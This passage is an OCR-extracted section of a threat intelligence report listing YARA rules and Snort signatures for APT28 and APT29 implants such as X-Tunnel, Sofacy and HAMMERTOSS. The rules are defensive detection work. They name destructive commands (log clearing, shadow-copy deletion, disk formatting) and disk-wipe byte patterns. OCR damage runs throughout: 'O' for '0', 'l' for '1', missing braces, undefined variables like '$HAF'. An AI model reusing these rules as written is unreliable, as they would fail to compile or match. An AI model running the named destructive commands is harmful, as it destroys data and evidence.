EC 60 8B FC B9 60 00 00 00 F3 A4 83 EF 60 6A OD 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68 
65 6C 54 FF 57} 

$al = {83 EC 04 60 E9 IE 01 00 00} 
condition: 


$al at entrypoint or any of ($f*) 


Rule IMPLANT_4_v9 


strings: 

$a = "wevtutil clear-log" ascii wide nocase 

$b = "vssadmin delete shadows" ascii wide nocase 
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$c = "AGlobal\\23dla259-88fa-41df-935f-cae523bab8e6" ascii wide nocase 
$d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase 
//$e = {57 55 33 c9 51 8b c3 99 57 52 50} 

SopenPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52 50 E8 ?? ?? ?? ?? 52 50 
E8 ?? ?? ?? ?? 83 C4 10 84 CO 75 21 33 CO 89 44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52 
50 56 FF 15 ?? ?? ?? ?? 85 CO 74 OB 83 C3 01 81 FB 00 01 00 00 7C B6 } 

$f = {83 c4 Oc 53 53 6a 03 53 6a 03 68 00 00 00 cO} 

condition: 

($a and $b) or $c or $d or (SopenPhysicalDiskOverwriteWithZeros and $f) 

} 


Rule IMPLANT_4_vlO 


strings: 

$= {A1B05C72} 
$= {EB3D0384} 
$= {6F45594E} 
$= {71815A4E} 
$= {D5B03E72} 
$= {6B43594E} 
$= {F572993D} 
$= {665D9DC0} 
$= {0BE7A75A} 
$= {F37443C5} 
$= {A2A474BB} 
$= {97DEEC67} 
$ = {7E0CB078} 
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$= {9C9678BF} 
$= {4A37A149} 
$= {8667416B} 
$= {0A375BA4} 
$= {DC505A8D} 
$= {02F1F808} 

$ = {2C819712} 
condition: 


uintl6(0) = 0x5A4D and uintl6(uint32(0x3c)) == 0x4550 and 15 of them 

} 


Rule IMPLANT_4_vl 1 

{ 

strings: 

$ = 7c format %c: /Y /X /FS:NTFS" 

$ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide 
$ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide 
$ = 

".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cf 
g.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide 

$tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) = 0x6674725C) and 2 of them 

} 

Rule IMPLANT_4_vl2 
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strings: 

$CMP1 = {81 ??4D 5A 00 00 } 

$SUB1 = {81 ?? 00 10 00 00} 

$CMP2 = {66 81 38 4D 5A} 

$SUB2= {2D 00 10 00 00} 

$HAL = "HAL.dll" 

$OUT = {E6 64 E9 ?? ?? FF FF} 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and ($CMP1 or $CMP2) and ($SUB1 or $SUB2) and $OUT 
and $HAF 


Rule IMPLANT_4_vl3 


strings: 

$XMFDOMl = {81 BF 33 29 36 7B D2 11 B2 0E 00 CO 4F 98 3E 60} 

$XMFDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 CO 4F 98 3E 60} 

$XMFPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00 66 83 7D ?C FF 75 
3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 CO 78 2?} 

$EXP1 = "DispatchCommand" 

$EXP2 = "DispatchEvent" 

$BDATA ={ 85 CO 74 1? OF B7 4? 06 83 C? 28 [0-6] 72 ?? 33 CO 5F 5E 5B 5D C2 08 00 8B 4? 
0? 8B 4? 0? 89 01 8B 4? OC 03 [0-2] EB E?} 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) = OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 
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The following YARA rules detect X-Tunnel, referred to as IMPLANT 5 with rule naming convention. 

IMPLANT 5 Rules: 

Rule IMPLANT_5_vl 

{ 

strings: 

$hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00 70 00 00 00 2D 00 50 00 
69 00 00 00 2D 00 50 00 70 00 00 00} 

$UDPMSG1 = "error 2005 recv from server UDP - %d\x0a" 

$TPSMSG1 = "error 2004 send to TPS - %d\x0a" 

STPSMSG2 = "error 2003 recv from TPS - %d\x0a" 

SUDPMSG2 = "error 2002 send to server UDP - %d\x0a" 

condition: 

any of them 


Rule IMPLANT_5_v2 


strings: 

$key0 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 } 
$keyl = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 } 
$key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 } 
$key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 } 
$key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 } 
$key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 } 
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$key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 } 

$key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE } 
$key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A } 
$key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB } 

$ key 10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D } 

$ key 11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 } 
$keyl2 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 } 
$keyl3 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 } 
$keyl4 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 } 
$keyl5 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 } 
$keyl6 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 } 
$keyl7 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E } 
$keyl8 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B } 
$keyl9 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 } 
$key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 } 
$key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 } 
$key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 } 
$key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 } 
$key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 } 
$key25 = { C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC } 
$key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB } 
$key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB } 
$key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 } 
$key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 } 
$key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B } 
$key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 } 
$key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 } 
$key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 } 


33 of 56 


TLP:WHITE 




TLP:WHITE 


$key34 

$key35 

$key36 

$key37 

$key38 

$key39 

$key40 

$key41 

$key42 

$key43 

$key44 

$key45 

$key46 

$key47 

$key48 

$key49 

$key50 

$key51 

$key52 

$key53 

$key54 

$key55 

$key56 

$key57 

$key58 

$key59 

$key60 

$key61 


{ C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643 B8A2D } 

{ 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F } 

{ 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 } 

{ 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 } 

{ C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 } 

{ 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 } 

{ C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 } 

{ C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 } 

{ 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 } 

{ 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F } 

{ DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 } 

{ 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 } 

{ 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C } 

{ 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C } 

{ 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C } 

{ A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 } 

{ 731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 } 

{ 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 } 

{ D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 } 

{ E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 } 

{ D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB } 

{ B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 } 

{ 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 } 

{ C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA } 

{ 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC } 
{ A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB } 
{ 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA } 

{ 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 } 
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$key62 = 
$key63 = 
$key64 = 
$key65 = 
$key66 = 
$key67 = 
$key68 = 
$key69 = 
$key70 = 
$key71 = 
$key72 = 
$key73 = 
$key74 = 
$key75 = 
$key76 = 
$key77 = 
$key78 = 
$key79 = 
$key80 = 
$key81 = 
$key82 = 
$key83 = 
$key84 = 
$key85 = 
$key86 = 
$key87 = 
$key88 = 
$key89 = 


{ 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 } 

{ CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB } 

{ A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F } 

{ 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C } 

{ A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD } 

{ E52 AD A1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A } 

{ 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B } 

{ FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 } 

{ 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 } 

{ 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 } 

{ 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 } 

{ 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 } 

{ C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 } 

{ D3979B1CBOEC1A655961559704D7CDC019253ACB2259DFB9255 8B7536D774441 } 

{ 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 } 
{ CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 } 

{ 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 } 

{ 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E } 

{ C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 } 

{ A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 } 

{ 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E } 

{ A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 } 

{ 83694CCA50B821144FFBBE6855F62845F1328111AE1AC5666CBA59EB43AA12C6 } 

{ 145E906416B17865AD37CD022DF5481F28C930D6E3F53C50B0953BF33F4DB953 } 

{ AB49B7C2FA3027A767F5AA94EAF2B312BBE3E89FD924EF89B92A7CF977354C22 } 

{ 7E04E478340C209B01CA2FEBBCE3FE77C6E6169F0B0528C42FA4BDA6D90AC957 } 

{ 0EADD042B9F0DDBABAOCA676EFA4EDB68A045595097E5A392217DFFC21A8532F } 

{ 5623710F134ECACD5B70434A1431009E3556343ED48E77F6A557F2C7FF46F655 } 
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$key90 = { 6968657DB62F4A119F8E5CB3BF5C51F4B285328613AA7DB9016F8000B576561F } 

$key91 = { DEBB9C95EAE6A68974023C335F8D2711135A98260415DF05845F053AD65B59B4 } 
$key92 = { 16F54900DBF08950F2C5835153AB636605FB8C09106C0E94CB13CEA16F275685 } 

$key93 = { 1C9F86F88F0F4882D5CBD32876368E7B311A84418692D652A6A4F315CC499AE8 } 
$key94 = { E920E0783028FA05F4CE2D6A04BBE636D56A775CFD4DAEA3F2A1B8BEEB52A6D4 } 
$key95 = { 73874CA3AF47A8A315D50E1990F44F655EC7C15B146FFE0611B6C4FC096BD07C } 
$key96 = { F21C1FA163C745789C53922C47E191A5A85301BDC2FFC3D3B688CFBFF39F3BE5 } 
$key97 = { BC5A861F21CB98BD1E2AE9650B7A0BB4CD0C71900B3463C1BC3380AFD2BB948E } 
$key98 = { 151B AE36E646F30570DC6 A7B57752F2481A0B48DD5184E914BCF411D8 AD5 AC AO } 
$key99 = { F05AD6D7A0CADC10A6468BFDBCBB223D5BD6CA30EE19C239E8035772D80312C9 } 
$keylOO = { 5DE9A0FDB37C0D59C298577E5379BCAF4F86DF3E9FA17787A4CEFA7DD10C462E } 

$ key 101 = { F5E62BA862380224D159A324D25FD321E5B35F8554D70CF9A506767713BCA508 } 
$keyl02 = { A2D1B10409B328DA0CCBFFDE2AD2FF10855F95DA36A1D3DBA84952BB05F8C3A7 } 
$keyl03 = { C974ABD227D3AD339FAC11C97E11D904706EDEA610B181B8FAD473FFCC36A695 } 
$keyl04 = { AB5167D2241406C3C0178D3F28664398D5213EE5D2C09DCC9410CB604671F5F1 } 
$keyl05 = { C25CC4E671CAAA31E137700A9DB3A272D4E157A6A1F47235043D954BAE8A3C70 } 
$keyl06 = { E6005757CA0189AC38F9B6D5AD584881399F28DA949A0F98D8A4E3862E20F715 } 
$keyl07 = { 204E6CEB4FF59787EF4D5C9CA5A41DDF4445B9D8E0C970B86D543E9C7435B194 } 
$keyl08 = { 831D7FD21316590263B69E095ABBE89E01A176E16AE799D83BD774AF0D254390 } 
$keyl09 = { 42C36355D9BC573D72F546CDB12E6BB2CFE2933AC92C12040386B310ABF6A1ED } 
$keyllO = { B9044393C09AD03390160041446BF3134D864D16B25F1AB5E5CDC690C4677E7D } 
$keyll 1 = { 6BC1102B5BE05EEBF65E2C3ACA1F4E17A59B2E57FB480DE016D371DA3AEF57A5 } 

$ key 112 = { B068D00B482FF73F8D23795743C76FE8639D405EE54D3EFB20AFD55A9E2DFF4E } 
$keyll3 = { 95CF5ADDFE511C8C7496E3B75D52A0C0EFE01ED52D5DD04D0CA6A7ABD3A6F968 } 
$keyll4 = { 75534574A4620019F8E3D055367016255034FA7D91CBCA9E717149441742AC8D } 

$ key 115 = { 96F1013A5301534BE424A11A94B740E5EB3A627D052D1B769E64BAB6A666433C } 
$keyll6 = { 584477AB45CAF729EE9844834F84683ABECAB7C4F7D23A9636F54CDD5B8F19B3 } 

$ key 117 = { D3905F185B564149EE85CC3D093477C8FF2F8CF601C68C38BBD81517672ECA3A } 
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$keyll8 = { BF29521A7F94636D1930AA236422EB6351775A523DE68AF9BF9F1026CEDA618D } 
$keyll9 = { 04B3A783470AF1613A9B849FBD6F020EE65C612343EB1C028B2C28590789E60B } 
$keyl20 = { 3D8D8E84977FE5D21B6971D8D873E7BED048E21333FE15BE2B3D1732C7FD3D04 } 

$ key 121 = { 8ACB88224B6EF466D7653EB0D8256EA86D50BBA14FD05F7A0E77ACD574E9D9FF } 
$keyl22 = { B46121FFCF1565A77AA45752C9C5FB3716B6D8658737DF95AE8B6A2374432228 } 
$keyl23 = { A4432874588D1BD2317224FB371F324DD60AB25D4191F2F01C5C13909F35B943 } 
$keyl24 = { 78E1B7D06ED2A2A044C69B7CE6CDC9BCD77C19180D0B082A671BBA06507349C8 } 
$keyl25 = { 540198C3D33A631801FE94E7CB5DA3A2D9BCBAE7C7C3112EDECB342F3F7DF793 } 
$keyl26 = { 7E905652CAB96ACBB7FEB2825B55243511DF1CD8A22D0680F83AAF37B8A7CB36 } 
$keyl27 = { 37218801DBF2CD92F07F154CD53981E6189DBFBACAC53BC200EAFAB891C5EEC8 } 
condition: 
any of them 

} 


Rule IMPLANT_5_v3 


strings: 

$BYTES1 = { OF AF CO 6? CO 07 00 00 00 2D 01 00 00 00 OF AF ?? 39 ?8 } 
$BYTES2 = { OF AF CO 6? CO 07 48 OF AF ?? 39 ?8 } 
condition: 


any of them 

} 


Rule IMPLANT_5_v4 


strings: 

$FBKEY 1 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 } 
$FBKEY2 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 } 
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$FBKEY3 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 } 
$FBKEY4 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 } 
$FBKEY5 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 } 
condition: 
all of them 


Network Indicators for Implant 5 


alert tcp any any -> any [$HTTP_PORTS,44300] (msg:"X Tunnel_HTTP_CONNECT_HANDSHAKE"; 
flow:established,to_server; dsize:4; content:"IOO 00 001"; offset:l; depth:3; byte_test:l,<,96,0; 
content: !"HTTP";) 


alert tcp any any -> any 443 (msg:"X TunnelJJPSTREAMJ30NNECTI0N_EVENT"; 
flow:established,to_server; stream_size:either,=,20; content:"l02 00 00 101"; depth:4;) 


The following YARA rules detect Sofacy, Sednit, EVILTOSS, referred to as IMPLANT 6 with rule 
naming convention. 

IMPLANT 6 Rules: 


Rule IMPLANT_6_vl 

{ 

strings: 

$STR1 = "dll.dll" wide ascii 
$STR2 = "Initl" wide ascii 
$STR3 = "netui.dll" wide ascii 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 


38 of 56 


TLP:WHITE 




TLP:WHITE 


Rule IMPLANT_6_v2 


strings: 

$obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D OF F7 F3 6A 07 8A 04 32 
33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 OC 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 
5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 CO E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 
14 89 7DF4 72A1 } 


condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 


Rule IMPLANT_6_v3 


strings: 

$deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A 04 3A 33 D2 8A 54 
37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A 1C 3A 8A 14 2E 32 C3 32 DO 41 88 14 2E 46 
83 FE 0A 7C ?? } 

condition: 

(uintl6(0) = 0x5A4D or uintl6(0) = OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 


Rule IMPLANT_6_v4 


strings: 

$ASM = {53 5? 5? [6-15] ff d? 8b ?? b? aO 86 01 00 [7-13] ff d? ?b [6-10] cO [0-1] c3} 
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condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 


Rule IMPLANT_6_v5 

{ 

strings: 

$STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 El 8B 44 24 20 53 55 8B EA 8D 14 08 
B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 Cl ED 02 8B DD 57 8B 7C 24 38 89 6C 24 1C Cl EE 
02 3B DE 89 5C 24 18 89 74 24 20 OF 83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD OF 85 
CF 00 00 00 8B Cl 33 D2 B9 06 00 00 00 F7 FI 8B CA 83 F9 06 89 4C 24 38 OF 83 86 00 00 00 8A C3 
B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D 71 02 03 DO 89 54 24 14 8B 54 24 10 33 CO 8A 
44 37 FE 03 D6 8B D8 8D 46 FF OF AF DA 33 D2 BD 06 00 00 00 F7 F5 Cl EB 07 8A 04 3A 33 D2 32 
D8 8D 46 01 F7 F5 8A 44 24 30 02 Cl 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 
14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38 41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C 
24 1C 8B 74 24 20 8B 4C 24 10 43 83 Cl 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 OF 82 3C FF 
FF FF 3B DD 75 1A 8B Cl 33 D2 B9 06 00 00 00 F7 FI 8B CA EB 0D 33 C9 89 4C 24 38 E9 40 FF FF 
FF 33 C9 8B 44 24 24 33 D2 BE 06 00 00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 OF 83 95 00 00 00 
8A C3 B2 06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34 8D 54 03 FE 89 
54 24 14 EB 04 8B 5C 24 34 33 CO BD 06 00 00 00 8A 44 3E FE 8B DO 8D 44 IE FE OF AF DO Cl EA 
07 89 54 24 2C 8D 46 FF 33 D2 BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01 
F7 F5 8A 44 24 30 02 Cl 8A OC 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 
OC 06 32 CB 88 OC 06 8B 4C 24 38 8B 44 24 24 41 46 3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18 
C2 10 00 } 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) = 0x6674725C) and all of them 

} 


Rule IMPLANT_6_v6 


strings: 
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$Initl_fun = {68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50 FF 15 ?? ?? ?? ?? 33 CO 
C3} 

condition: 

(uintl6(0) == 0x5A4D or uintl6(0) == OxCFDO or uintl6(0) = 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) == 0x6674725C) and all of them 

} 


Rule IMPLANT_6_v7 

{ 

strings: 

$STR1 = "Initl" 

$OPTl = "ServiceMain" 

$OPT2 = "netids" nocase wide ascii 
$OPT3 = "netui" nocase wide ascii 
$OPT4 = "svchost.exe" wide ascii 
$OPT5 = "network" nocase wide ascii 
condition: 

(uintl6(0) == 0x5A4D or uintl6(0) = OxCFDO or uintl6(0) == 0xC3D4 or uint32(0) == 
0x46445025 or uint32(l) = 0x6674725C) and $STR1 and 2 of ($OPT*) 

} 
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APPENDIX B: APT29 


This section details six implants associated with APT29 actors. Included are YARA rules as well as 
SNORT signatures. Please note that despite being sound production rules, there is still the chance for 
False Positives. In addition, these will complement additional analysis and should not be used as the sole 
source of attribution. 

The following YARA rules detect IMPLANT 7, with rule naming convention. 


IMPLANT 7 Rules: 


Rule IMPLANT_7_vl 

{ 

strings: 

$MZ = "MZ" 

$STR1 = { 8A 44 OA 03 32 C3 OF B6 CO 66 89 04 4E 41 3B CF 72 EE } 

$STR2 = { F3 OF 6F 04 08 66 OF EF Cl F3 OF 7F 04 11 83 Cl 10 3B CF 72 EB } 
condition: 

$MZ at 0 and ($STR1 or $STR2) 


Network Indicators for Implant 7 


alert tcp any any -> any 80 (content:".php?"; 

pcre:"/V(?:indexlstatuslcapthaljsonlcsslajaxljs)\.php\?(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcssl 

imlcodelsearch)=[a-z0- 

9]{0,26}\&(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcsslimlcodelsearch)=[a-z0-9]{0,26} HTTP/"; 
msg:"Cache_DLL beacon GET 2 arg"; sid:1234;) 


alert tcp any any -> any 80 (content:".php?"; 

pcre:"/V(?:indexlstatuslcapthaljsonlcsslajaxljs)\.php\?(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcssl 

imlcodelsearch)=[a-z0- 
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9]{0,26}\&(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcsslimlcodelsearch)=[a-z0- 
9]{0,26}\&(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcsslimlcodelsearch)=[a-z0-9]{0,26} HTTP/"; 
msg:"Cache_DLL beacon GET 3 arg"; sid:1234;) 


alert tcp any any -> any 80 (content:".php?"; 

pcre:"/V(?:indexlstatuslcapthaljsonlcsslajaxljs)\.php\?(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcssl 

imlcodelsearch)=[a-zO- 

9]{0,26}\&(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcsslimlcodelsearch)=[a-z0- 
9]{0,26}\&(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcsslimlcodelsearch)=[a-z0- 
9]{0,26}\&(?:idlitemlmodelpagelstatuslslfltlklllmlnlblvlclappljslcsslimlcodelsearch)=[a-z0-9]{0,26} HTTP/"; 
msg:"Cache_DLL beacon GET 4 arg"; sid:1234;) 


The following YARA rules detect HAMMERTOSS / HammerDuke, referred to as IMPLANT 8 with rule 
naming convention. 


IMPLANT 8 Rules: 


rule IMPLANT_8_vl 

{ 

strings: 

$DOTNET = "mscorlib" ascii 

$REF_URL - "https://www.google.com/url?sa=" wide 

$REF_var_l = "&rct=" wide 

$REF_var_2 = "&q=&esrc=" wide 

$REF_var_3 = "&source=" wide 

$REF_var_4 = "&cd=" wide 

$REF_var_5 = "&ved=" wide 

$REF_var_6 = "&url=" wide 

$REF_var_7 = "&ei=" wide 

$REF_var_8 = "&usg=" wide 
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$REF_var_9 = "&bvm=" wide 
$REF_value_l = "QFj" wide 
$REF_value_2 = "bv.81" wide 
condition: 

(uintl6(0) == 0x5A4D) and ($DOTNET) and ($REF_URF) and (3 of ($REF_var*)) and (1 of 
($REF_value*)) 

} 


Rule IMPLANT_8_v2 

{ 

strings: 

$DOTNET= "mscorlib" ascii 
$XOR = {61 20 AA 00 00 00 61} 
condition: 

(uintl6(0) == 0x5 A4D) and all of them 


Network Indicator for Implant 8 


